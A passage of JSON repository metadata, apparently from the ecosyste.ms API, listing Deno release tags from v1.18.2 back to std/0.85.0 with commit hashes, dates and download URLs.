eases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"ht